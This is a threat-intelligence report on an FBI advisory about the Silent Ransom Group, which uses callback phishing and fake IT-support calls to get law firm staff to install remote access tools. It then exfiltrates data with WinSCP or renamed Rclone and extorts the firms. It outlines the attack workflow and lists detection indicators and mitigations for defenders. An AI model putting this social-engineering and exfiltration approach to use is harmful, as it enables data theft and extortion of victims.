Full Report
The FBI is warning that a threat group is using IT-themed social engineering calls and callback phishing emails to gain remote access to systems and steal sensitive data. The Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, will then use the stolen data to extort the law firms, the advisory from the FBI’s Cyber Division said. Silent Ransom Group Finds a Niche Targeting Law Firms While SRG has historically targeted other sectors such as medical and insurance organizations, beginning in Spring 2023, the group has consistently targeted U.S.-based law firms and organizations with “similar naming conventions,” the FBI said, “likely due to the highly sensitive nature of legal industry data.” The group has been operating since 2022 and is primarily known for callback phishing emails, aka reverse vishing, where the group pretends to be well-known companies purporting to charge small subscription fees. If the victim wishes to cancel the fake subscription, they must call the threat actor, who emails the victim a link to download remote access software to gain access to their device or system. Once they’ve established access, the threat group will search for sensitive data to exfiltrate and then send a ransom notice to the victim threatening to release the data if the ransom is not paid. Beginning in March 2025, the group changed tactics by calling individuals and claiming to be an employee from their organization’s IT department, known as social engineering calls or vishing, short for “voice phishing.” The threat actor then tries to get the employee to join a remote access session. If the employee grants access to their device, “they are told that work needs to be done overnight,” the FBI said. “Once in the victim’s device, a typical SRG attack involves minimal privilege escalation and quickly pivots to data exfiltration conducted through ‘WinSCP’ (Windows Secure Copy) or a hidden or renamed version of ‘Rclone,’” the FBI advisory said. In the short amount of time SRG has been pursuing the vishing tactic, “it has been highly effective and resulted in multiple compromises,” the FBI said. The group will also call victim organizations to pressure them into ransom negotiations. While SRG has a publicly available site to post victim data, “they are inconsistent in their use of the site, and do not always follow through on posting victim data,” the FBI said. SRG Attacks Difficult to Detect Because SRG uses legitimate management and remote access tools, attacks are unlikely to be detected by traditional antivirus tools. Organizations are advised to monitor for the following potential signs of compromise: New unauthorized downloads of system management or remote access tools such as Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera WinSCP or Rclone connections made to an external IP address Emails from an unnamed group claiming data was stolen Voicemails or phone calls from an unnamed group claiming data was stolen Emails about subscription services that provide a phone number and require a call to remove pending charges Employees receiving unsolicited phone calls from individuals claiming to work in their IT department. Recommendations include: Conducting staff training on phishing Developing and communicating policies for authenticating IT staff with employees Implementing two-factor authentication for all employees. The FBI is seeking any information from SRG victims that can be legally shared, such as ransom notes, phone numbers used by the threat actor, communications such as voicemails, cryptocurrency wallet information, and more.
Analysis Summary
# Threat Actor: Silent Ransom Group (SRG)
## Attribution & Identity
Information regarding specific attribution beyond the FBI warning is absent. The actor is referred to generally as a "Silent Ransom Group (SRG)." It is a known ransomware threat actor.
## Activity Summary
The FBI has issued a warning concerning SRG's recent campaign, which primarily targets law firms. A notable tactic observed is the use of vishing (voice phishing) to effectively compromise targets. Attackers pressure victims into commencing ransom negotiations, sometimes utilizing a publicly available data leak site, though their adherence to posting victim data is inconsistent.
## Tactics, Techniques & Procedures
- **Initial Access/Vishing:** Employing highly effective vishing tactics to gain initial access or further compromise. They pressure victims via phone calls regarding ransom negotiations.
- **Data Exfiltration:** Quickly pivots to data exfiltration after compromise.
- **Minimal Privilege Escalation:** SRG performs minimal privilege escalation post-entry.
- **Use of Legitimate Tools:** Relies on legitimate management and remote access tools, making detection by traditional AV difficult.
- **Pressure Tactics:** Victims are told work needs to be done overnight to rush the process.
- **Social Engineering:** Sending emails claiming data was stolen, or unsolicited calls claiming to be from the victim's IT department. They also send emails related to subscription services requiring a call to cancel pending charges to initiate contact.
- [No specific standardized MITRE ATT&CK IDs were provided in the source material.]
## Targeting
- Sectors: Law Firms (Primary focus mentioned in the advisory).
- Geography: United States (Implied by the FBI advisory).
- Victims: Law firms are the explicitly stated target sector for this specific FBI warning.
## Tools & Infrastructure
- **Data Exfiltration Tools:** 'WinSCP' (Windows Secure Copy) or a hidden/renamed version of 'Rclone'.
- **Remote Access/Management Tools (Used for C2/Operations):** Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera.
- **Infrastructure:**
- Ransom notes.
- Phone numbers used by the threat actor (Solicited for investigation).
- Cryptocurrency wallet information (Solicited for investigation).
- Publicly available data leak site (Inconsistently used).
## Implications
SRG poses a significant threat due to its effective use of vishing, enabling them to bypass traditional security controls like antivirus software by leveraging legitimate remote access tools. Their focus on the legal sector suggests an interest in sensitive client data or high-value corporate records, and their use of pressure tactics aims to expedite ransom payments.
## Mitigations
- **Monitoring:** Monitor for unauthorized downloads of management/remote access tools (Zoho Assist, Syncro, AnyDesk, Splashtop, Atera).
- **Network Monitoring:** Monitor for WinSCP or Rclone connections initiated to unapproved external IP addresses.
- **Communication Policy:** Develop and actively communicate clear policies for authenticating IT staff interactions, ensuring employees can verify identity reliably.
- **Staff Training:** Conduct specific staff training focusing on phishing, vishing, and social engineering tactics, especially regarding unsolicited IT support calls or unexpected subscription service calls.
- **Authentication:** Implement Multi-Factor Authentication (MFA/2FA) for all employee accounts.
- **Alert Monitoring:** Be vigilant for initial compromise indicators, including emails threatening data leaks or unsolicited calls claiming to be from internal IT teams.